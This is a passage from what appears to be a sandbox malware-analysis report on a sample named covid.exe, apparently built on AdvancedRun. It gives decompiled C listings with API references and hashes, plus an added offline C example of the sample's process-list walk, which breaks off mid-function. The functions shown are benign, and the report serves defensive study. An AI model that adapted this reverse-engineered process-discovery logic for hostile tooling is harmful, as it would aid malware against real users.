                                                                  						L18:
                                                                  						CloseHandle(_v16);
                                                                  					}
                                                                  				}
                                                                  				return _a8;
                                                                  			}
                                                                  0x0040935e
                                                                  0x00409363
                                                                  0x0040936b
                                                                  0x0040936d
                                                                  0x00409377
                                                                  0x00409385
                                                                  0x0040938d
                                                                  0x0040939d
                                                                  0x004093a5
                                                                  0x004093ac
                                                                  0x004093b4
                                                                  0x004093c5
                                                                  0x004093c9
                                                                  0x004093da
                                                                  0x004093df
                                                                  0x004093e5
                                                                  0x004093e6
                                                                  0x004093ea
                                                                  0x004093f6
                                                                  0x004093fc
                                                                  0x00409407
                                                                  0x00409407
                                                                  0x0040941d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409423
                                                                  0x00409428
                                                                  0x00409375
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040942e
                                                                  0x00000000
                                                                  0x00409428
                                                                  0x00409377
                                                                  0x0040936d
                                                                  0x004094fb
                                                                  0x004094ff
                                                                  0x004094ff
                                                                  0x00409337
                                                                  0x0040950f

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                  • memset.MSVCRT ref: 0040938D
                                                                  • memset.MSVCRT ref: 0040939D
                                                                    • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                  • memset.MSVCRT ref: 00409488
                                                                  • wcscpy.MSVCRT ref: 004094A9
                                                                  • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                  • String ID:
                                                                  • API String ID: 3300951397-0
                                                                  • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                  • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                  • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                  • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 44%
                                                                  			E00402EC8(void* __ebx) {
                                                                  				struct tagRECT _v20;
                                                                  				struct tagPAINTSTRUCT _v84;
                                                                  
                                                                  				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                  				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                  				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                  				asm("movsd");
                                                                  				asm("movsd");
                                                                  				asm("movsd");
                                                                  				asm("movsd");
                                                                  				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                  				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                  			}

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                  • String ID:
                                                                  • API String ID: 19018683-0
                                                                  • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                  • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                  • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                  • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 50%
                                                                  			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                  				void _v514;
                                                                  				signed short _v516;
                                                                  				signed short* _t34;
                                                                  				signed int _t37;
                                                                  				void* _t40;
                                                                  				signed short* _t44;
                                                                  				void* _t46;
                                                                  
                                                                  				_t40 = __edi;
                                                                  				E00407343(__edi, _a4, L"<item>\r\n");
                                                                  				_t37 = 0;
                                                                  				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                  					do {
                                                                  						_v516 = _v516 & 0x00000000;
                                                                  						memset( &_v514, 0, 0x1fc);
                                                                  						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                  						_t44 =  &_v516;
                                                                  						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                  						_t34 = _t44;
                                                                  						_push(_t34);
                                                                  						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                  						_push(_t34);
                                                                  						_push(L"<%s>%s</%s>\r\n");
                                                                  						_push(0x2000);
                                                                  						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                  						L0040B1EC();
                                                                  						_t46 = _t46 + 0x24;
                                                                  						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                  						_t37 = _t37 + 1;
                                                                  					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                  				}
                                                                  				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004079DB
                                                                    • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                  • _snwprintf.MSVCRT ref: 00407A25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                  • API String ID: 1775345501-2769808009
                                                                  • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                  • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                  • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                  • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 64%
                                                                  			E0040467A(void* __edi) {
                                                                  				signed int _v8;
                                                                  				void* _v12;
                                                                  				void* _v16;
                                                                  				void _v2062;
                                                                  				short _v2064;
                                                                  				int _t16;
                                                                  
                                                                  				_v8 = _v8 & 0x00000000;
                                                                  				_t16 = E004043F8( &_v12, 0x20019);
                                                                  				if(_t16 == 0) {
                                                                  					_v2064 = _v2064 & _t16;
                                                                  					memset( &_v2062, _t16, 0x7fe);
                                                                  					_push(__edi + 0x20a);
                                                                  					_push(L"%s\\shell\\%s");
                                                                  					_push(0x3ff);
                                                                  					_push( &_v2064);
                                                                  					L0040B1EC();
                                                                  					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                  						_v8 = 1;
                                                                  						RegCloseKey(_v16);
                                                                  					}
                                                                  				}
                                                                  				return _v8;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004046AF
                                                                  • _snwprintf.MSVCRT ref: 004046CD
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen_snwprintfmemset
                                                                  • String ID: %s\shell\%s
                                                                  • API String ID: 1458959524-3196117466
                                                                  • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                  • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                  • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                  • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 16%
                                                                  			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                  				signed short _v131076;
                                                                  
                                                                  				_t25 = __esi;
                                                                  				E0040B550(0x20000, __ecx);
                                                                  				if(_a4 == 0) {
                                                                  					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                  				} else {
                                                                  					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                  						_push(_a24);
                                                                  					} else {
                                                                  						_v131076 = _v131076 & 0x00000000;
                                                                  						_push(__esi);
                                                                  						_push(L"\"%s\"");
                                                                  						_push(0xfffe);
                                                                  						_push( &_v131076);
                                                                  						L0040B1EC();
                                                                  						_push(_a24);
                                                                  						_push( &_v131076);
                                                                  					}
                                                                  					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 00409D79
                                                                  • _snwprintf.MSVCRT ref: 00409D9E
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 00409DD4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                  • String ID: "%s"
                                                                  • API String ID: 1343145685-3297466227
                                                                  • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                  • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                  • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                  • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 38%
                                                                  			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                  				char _v2052;
                                                                  				short _v4100;
                                                                  				void* __edi;
                                                                  				long _t15;
                                                                  				long _t16;
                                                                  
                                                                   				_t15 = __ecx;
                                                                   				E0040B550(0x1000, __ecx); // stack probe (__chkstk-style) for the two large local buffers
                                                                   				_t16 = _t15;
                                                                   				if(_t16 == 0) {
                                                                   					_t16 = GetLastError(); // a zero code means "report the thread's last error"
                                                                   				}
                                                                   				E00404706(_t16,  &_v2052); // fills _v2052 with the message text for code _t16
                                                                   				_push( &_v2052);
                                                                   				_push(_t16);
                                                                   				_push(L"Error %d: %s");
                                                                   				_push(0x400);
                                                                   				_push( &_v4100);
                                                                   				L0040B1EC(); // _snwprintf (see APIs), at most 0x400 wide characters
                                                                   				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30); // 0x30 = MB_ICONEXCLAMATION
                                                                  			}

                                                                   Instruction addresses, one per decompiled line in order:
                                                                   0x004047d2 0x004047da 0x004047e0 0x004047e4 0x004047ec 0x004047ec 0x004047f5
                                                                   0x00404800 0x00404801 0x00404802 0x0040480d 0x00404812 0x00404813 0x00404834

                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                  • _snwprintf.MSVCRT ref: 00404813
                                                                  • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                  • String ID: Error$Error %d: %s
                                                                  • API String ID: 313946961-1552265934
                                                                  • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                  • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                  • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                  • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                  				void* _v8;
                                                                  				signed int _v12;
                                                                  				void* __ebx;
                                                                  				void* __ecx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t74;
                                                                  				signed int _t76;
                                                                  				signed short _t85;
                                                                  				signed int _t87;
                                                                  				intOrPtr _t88;
                                                                  				signed short _t93;
                                                                  				void* _t95;
                                                                  				signed int _t124;
                                                                  				signed int _t126;
                                                                  				signed int _t128;
                                                                  				intOrPtr* _t131;
                                                                  				signed int _t135;
                                                                  				signed int _t137;
                                                                  				signed int _t138;
                                                                  				void* _t141;
                                                                  				void* _t142;
                                                                  				void* _t146;
                                                                  
                                                                  				_t142 = __eflags;
                                                                  				_push(_t102);
                                                                  				_t131 = __eax;
                                                                  				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                  				E00406746(__eax);
                                                                  				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                  				_t135 = 5;
                                                                  				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                  				_t124 = 0x14;
                                                                  				_t74 = _t135 * _t124;
                                                                  				 *(_t131 + 0x2d0) = _t135;
                                                                   				_push( ~(0 | _t142 > 0x00000000) | _t74); // 5 * 0x14 bytes, with the compiler's overflow-saturating size guard
                                                                   				L0040B26C(); // operator new (??2@YAPAXI@Z, see APIs)
                                                                  				 *(_t131 + 0x2d4) = _t74;
                                                                  				_t126 = 0x14;
                                                                  				_t76 = _t135 * _t126;
                                                                  				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                  				L0040B26C();
                                                                  				_t95 = 0x40f008;
                                                                  				 *(_t131 + 0x40) = _t76;
                                                                  				_v8 = 0x40f008;
                                                                   				do { // static .data table 0x40f008..0x40f0d0: 5 records of 0x28 bytes, each two 0x14-byte halves
                                                                  					_t137 =  *_t95 * 0x14;
                                                                  					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                  					_t24 = _t95 + 0x14; // 0x40f01c
                                                                  					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                  					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                  					_t141 = _t141 + 0x18;
                                                                  					_v12 = _t85;
                                                                  					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                   					if((_t85 & 0xffff0000) == 0) { // +0x10 with an empty high word is treated as a string resource ID
                                                                   						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff); // E00405B81 resolves it via LoadStringW (see subcalls)
                                                                  						_t93 = E00405B81(_v12 | 0x00010000);
                                                                  						_t95 = _v8;
                                                                  						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                  					}
                                                                  					_t95 = _t95 + 0x28;
                                                                  					_t146 = _t95 - 0x40f0d0;
                                                                  					_v8 = _t95;
                                                                  				} while (_t146 < 0);
                                                                  				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                  				_t138 = 5;
                                                                  				_t128 = 4;
                                                                  				_t87 = _t138 * _t128;
                                                                  				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                  				 *(_t131 + 0x2c) = _t138;
                                                                  				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                  				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                  				L0040B26C();
                                                                  				_push(0xc);
                                                                  				 *(_t131 + 0x30) = _t87;
                                                                  				L0040B26C();
                                                                  				_t139 = _t87;
                                                                  				if(_t87 == 0) {
                                                                  					_t88 = 0;
                                                                  					__eflags = 0;
                                                                  				} else {
                                                                  					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                  				}
                                                                  				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                  				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                  				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                  				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                  				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                  				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                  				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                  				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                  				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                  				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                  				return E0040686C(_t131);
                                                                  			}

                                                                   Instruction addresses, one per decompiled line in order:
                                                                   0x004068ec 0x004068f0 0x004068f4 0x004068ff 0x00406902 0x0040690a 0x00406910
                                                                   0x00406911 0x0040691b 0x0040691e 0x00406923 0x0040692d 0x0040692e 0x00406933
                                                                   0x0040693d 0x00406940 0x00406949 0x0040694a 0x00406950 0x00406956 0x00406959
                                                                   0x0040695c 0x00406964 0x0040696d 0x00406974 0x0040697e 0x00406989 0x00406990
                                                                   0x00406998 0x0040699b 0x0040699f 0x004069b8 0x004069bc 0x004069c4 0x004069c7
                                                                   0x004069c7 0x004069cb 0x004069ce 0x004069d4 0x004069d4 0x004069d9 0x004069df
                                                                   0x004069e6 0x004069ea 0x004069ef 0x004069f2 0x004069f5 0x00406a00 0x00406a01
                                                                   0x00406a06 0x00406a08 0x00406a0b 0x00406a10 0x00406a16 0x00406a25 0x00406a25
                                                                   0x00406a18 0x00406a1e 0x00406a1e 0x00406a27 0x00406a2f 0x00406a32 0x00406a35
                                                                   0x00406a3b 0x00406a41 0x00406a47 0x00406a4d 0x00406a53 0x00406a5d 0x00406a6d

                                                                  APIs
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                  • memcpy.MSVCRT ref: 0040696D
                                                                  • memcpy.MSVCRT ref: 0040697E
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 975042529-0
                                                                  • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                  • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                  • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                  • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
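
The next listing, E004097A9, calls a runtime-resolved function pointer (0x41c47c) with information class 5 and a buffer it then walks entry by entry until a zero link, looking at the fields at +0x3c and +0x20. The example below is added here and is not code from covid.exe or from AdvancedRun: it reproduces that walk in C over a constructed buffer so that it runs offline on any host. It rests on two assumptions, stated again in the comments: that the pointer is NtQuerySystemInformation (class 5 is SystemProcessInformation, and the zero-terminated link walk matches it), and that the buffer uses the 32-bit SYSTEM_PROCESS_INFORMATION layout, in which +0x00 is NextEntryOffset, +0x20 is CreateTime and +0x3c is ImageName.Buffer, the three offsets the decompiled code reads. The process names and CreateTime values are made up for the example. It goes beyond the sample in one respect: it bounds-checks NextEntryOffset and ImageName.Buffer, which the listing does not do.

```c
/* Added example (not code from covid.exe or AdvancedRun): the process-list walk
 * of E004097A9 over a constructed SystemProcessInformation buffer. Assumptions:
 * 32-bit SYSTEM_PROCESS_INFORMATION layout, and that the pointer at 0x41c47c is
 * NtQuerySystemInformation. No live query is made, so this runs on any host. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Offsets the decompiled code reads: NextEntryOffset 0x00, CreateTime 0x20 (8
 * bytes), ImageName (UNICODE_STRING) at 0x38 with its 32-bit Buffer at 0x3c. */
#define OFF_NEXT     0x00u
#define OFF_CREATE   0x20u
#define OFF_NAME_LEN 0x38u
#define OFF_NAME_BUF 0x3cu
#define HDR_SIZE     0x40u       /* fixed header; thread records would follow it */
#define MAX_NAME     0x104u      /* the sample copies at most MAX_PATH wide chars */
#define FAKE_BASE    0x00A00000u /* pretend VA of the buffer (example assumption) */

static uint32_t rd32(const uint8_t *p) { return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | (uint64_t)rd32(p + 4) << 32; }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void wr64(uint8_t *p, uint64_t v) { wr32(p, (uint32_t)v); wr32(p + 4, (uint32_t)(v >> 32)); }

/* Sizing rule from the listing: a zero required length falls back to 100000
 * bytes, then 16000 bytes of slack are added before operator new. */
static uint32_t alloc_size(uint32_t required) {
    if (required == 0) required = 0x186a0;
    return required + 0x3e80;
}
/* Append one entry at buf+off: 0x40-byte header, then the name as UTF-16LE.
 * A NULL name models the Idle entry (ImageName.Buffer == NULL), which the
 * sample skips. ImageName.Buffer holds FAKE_BASE + offset, like a real VA. */
static size_t add_entry(uint8_t *buf, size_t off, const char *name, uint64_t create_time, int last) {
    size_t used = HDR_SIZE;
    memset(buf + off, 0, HDR_SIZE);
    wr64(buf + off + OFF_CREATE, create_time);
    if (name) {
        size_t n = strlen(name);
        uint8_t *dst = buf + off + HDR_SIZE;
        for (size_t i = 0; i < n; i++) { dst[2 * i] = (uint8_t)name[i]; dst[2 * i + 1] = 0; }
        dst[2 * n] = dst[2 * n + 1] = 0;                         /* wide NUL terminator */
        buf[off + OFF_NAME_LEN] = (uint8_t)(2 * n);              /* ImageName.Length in bytes */
        buf[off + OFF_NAME_LEN + 1] = (uint8_t)((2 * n) >> 8);
        wr32(buf + off + OFF_NAME_BUF, FAKE_BASE + (uint32_t)(off + HDR_SIZE));
        used += 2 * n + 2;
    }
    used = (used + 7) & ~(size_t)7;                              /* entries are 8-byte aligned */
    wr32(buf + off + OFF_NEXT, last ? 0 : (uint32_t)used);
    return off + used;
}
/* The walk of E004097A9: skip entries whose ImageName.Buffer is NULL, compare
 * the name case-insensitively (ASCII), stop at NextEntryOffset == 0. The bounds
 * checks are added here; the sample trusts the kernel-filled buffer. Returns 1
 * on a match (CreateTime in *create_time), 0 if absent, -1 if malformed. */
static int find_process(const uint8_t *buf, size_t len, const char *target, uint64_t *create_time) {
    size_t off = 0;
    for (;;) {
        if (off + HDR_SIZE > len) return -1;
        uint32_t name_ptr = rd32(buf + off + OFF_NAME_BUF);
        if (name_ptr != 0) {
            if (name_ptr < FAKE_BASE || name_ptr - FAKE_BASE >= len) return -1;
            size_t np = name_ptr - FAKE_BASE;
            for (size_t i = 0; i < MAX_NAME && np + 2 * i + 1 < len; i++) {
                uint8_t lo = buf[np + 2 * i], hi = buf[np + 2 * i + 1];
                int c = hi ? 0x100 : tolower(lo);                /* non-ASCII never matches */
                if (c != tolower((unsigned char)target[i])) break;
                if (c == 0) { *create_time = rd64(buf + off + OFF_CREATE); return 1; }
            }
        }
        uint32_t next = rd32(buf + off + OFF_NEXT);
        if (next == 0) return 0;
        if (next < HDR_SIZE || next > len - off) return -1;
        off += next;
    }
}

/* Constructed sample (not from the report) with made-up CreateTime values. */
static uint8_t g_buf[1024];                                      /* static: padding stays zero */
static uint64_t g_ct;                                            /* CreateTime of the last match */
static size_t build_sample(void) {
    size_t off = add_entry(g_buf, 0, NULL, 0, 0);                /* Idle: no image name */
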